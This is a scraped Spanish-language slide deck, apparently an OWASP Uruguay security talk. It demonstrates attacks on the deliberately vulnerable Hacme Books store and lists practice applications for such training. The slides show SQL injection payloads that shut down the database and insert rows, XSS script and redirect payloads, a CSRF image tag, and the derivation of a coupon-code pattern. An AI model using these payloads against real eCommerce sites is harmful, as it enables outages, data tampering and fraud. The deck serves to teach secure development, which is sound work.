Descargar la presentación
La descarga está en progreso. Por favor, espere
1
de Hacking a un eCommerce
Ejemplos Prácticos de Hacking a un eCommerce Mateo Martínez, QSA, CISSP OWASP URUGUAY
2
OWASP Vulnerable Web Applications Directory Project
Get out of Jail! Offline Virtual Machines (VMs) or ISO images Online/Live Offline: The following list references downloadable vulnerable web applications to play with that can be installed on a standard operating system (Linux, Windows, Mac OS X, etc) using a standard web platform (Apache/PHP, Tomcat/Java, IIS/.NET, etc). The BodgeIt Store (Java): (download) OWASP Bricks (PHP): & docs) The ButterFly Security Project (PHP): (download) bWAPP - an extremely buggy web application! (PHP): (docs) Damn Vulnerable Web Application - DVWA (PHP): (download) Damn Vulnerable Web Services - DVWS (PHP): (download) OWASP Hackademic Challenges Project (PHP): (download) Google Gruyere (Python): (download) Hacme Bank (.NET): (download) Hacme Books (Java): (download) Hacme Casino (Ruby on Rails): Hacme Shipping (ColdFusion): (download) Hacme Travel (C++): (download) OWASP Insecure Web App Project (Java): (download -orphaned) Mutillidae (PHP): (download) OWASP .NET Goat (C#): (download) Peruggia (PHP): (download) Puzzlemall (Java): (download) (docs) Stanford Securibench (Java) & Micro: (download) SQLI-labs (PHP): (blog) SQLol (PHP): OWASP Vicnum Project (Perl & PHP): (download) VulnApp (.NET): (CVS download & vulns) WackoPicko (PHP): (download) (whitepaper) OWASP WebGoat (Java): (guide) OWASP ZAP WAVE - Web Application Vulnerability Examples (Java): Wavsep - Web Application Vulnerability Scanner Evaluation Project (Java): (download) (docs) WIVET - Web Input Vector Extractor Teaser: Virtual Machines (VMs) or ISO images: The following list references preinstalled and ready to use virtual machines (VMs) or ISO images that contain one or multiple vulnerable web applications to play with. BadStore (ISO): (download - registration required) Bee-Box (bWAPP VMware): OWASP BWA - Broken Web Applications Project (VMware - list): (download) Drunk Admin Web Hacking Challenge (VMware): (download) Exploit.co.il Vuln Web App (VMware): (download) GameOver (VMware): Hackxor (VMware): (download) (hints&tips) Hacme Bank Prebuilt VM (VMware): (download) Kioptrix4 (VMware & Hyper-V): (download) LAMPSecurity (VMware): (download) (doc) Metasploitable (VMware): - torrent) (doc) Metasploitable 2 (VMware): Moth (VMware): (download) PentesterLab - The Exercises (ISO & PDF): PHDays I-Bank (VMware): Samurai WTF (ISO - list): (download) Sauron (Quemu) [Spanish]: (solutions) UltimateLAMP (VMware - list): (download) Virtual Hacking Lab (ZIP): (download) Web Security Dojo (VMware, VirtualBox - list): Online/Live: The following list references online and live vulnerable web applications available on the Internet to play with. Acunetix: (Forum - ASP) (Blog - .NET) (Art shopping - PHP) Cenzic CrackMeBank: Google Gruyere (Python): Hacking-Lab (eg. OWASP Top 10): Hack.me (beta): HackThisSite (HTS - Basic & Realistic (web) Missions): Hackxor online demo: (algo/smurf) HP/SpiDynamics Free Bank Online: (admin/admin) IBM/Watchfire AltoroMutual: (jsmith/Demo1234) NTOSpider Web Scanner Test Site: (testuser/testpass) OWASP Hackademic Challenges Project - Live (PHP - Joomla): Pentester Academy:
3
HackPack v1.0 Hacme Bank - Android v1.0 Hacme Bank v2.0 Hacme Books
Hacme Casino v1.0 Hacme Shipping Hacme Travel Hacme Bank™ Android is designed to teach mobile application developers, programmers, architects and security professionals how to create secure software and evaluate their own software to identify vulnerabilities. Hacme Bank™ is designed to teach application developers, programmers, architects and security professionals how to create secure software. Foundstone Hacme Books is a learning platform for secure software developmentFoundstone Hacme Casino™ is a learning platform for secure software development. Hacme Shipping is a web-based shipping application developed to demonstrate common web application hacking techniques. Hacme Travel is designed to create secure software.
4
#1 Generación de Errores
5
“ ’ ”
6
stack trace
7
“ ’ ” • Tipo de BD – Hypersonic SQL (org.hsqldb)
• Servidor de Aplicación – Apache Tomcat • Utiliza Spring framework • Aplicación J2EE application – Java namespaces
8
#2 Inyección SQL (a)
9
Comando para hacer un halt al servidor de BD en HSQLDB :
SHUTDOWN
10
Comando para hacer un halt al servidor de BD en HSQLDB :
SHUTDOWN
11
select * from products where title like '%texto_del_usuario%' and like
'%otro_texto_del_usuario%'
12
select * from products where title like '%'; SHUTDOWN; --%' and like
'%otro_texto_del_usuario%'
13
#2 Inyección SQL (b)
14
my feedback', 735); insert into products (title, description, popularity, price, vendor, category, publisher, isbn, author, imgurl, quantity) values ('Eat my shorts you pointy haired boss','A great book',4,29.95,'Amazon','Technical','Addison Wesley',' ','Disgruntled Employee',' --
15
#3 XSS (Cross-Site Scripting)
16
<script>alert("XSS")</script>
17
You should buy our latest bestseller instead of this book.
<script> location=" </script>
18
#4 CSRF (Cross-Site Request Forgery)
19
You should really consider purchasing the latest bestseller.
<img src= height="1"/>
20
#5 Crypto
21
15 % de Descuento AEODBOBOOF 25% de Descuento BEAAABBOOF BEOABDBOOF
22
AEODBOBOOF BEAAABBOOF BEOABDBOOF
BEAAAB2006 BEOABD2006
23
Probar este cupón: IEODBOBOAD
% Mes Día Año IE OD BO BOAD Probar este cupón: IEODBOBOAD
24
#6 Broken Access Control
26
Hacme Books
27
¡Muchas gracias! mateo.martinez@owasp.org
Presentaciones similares
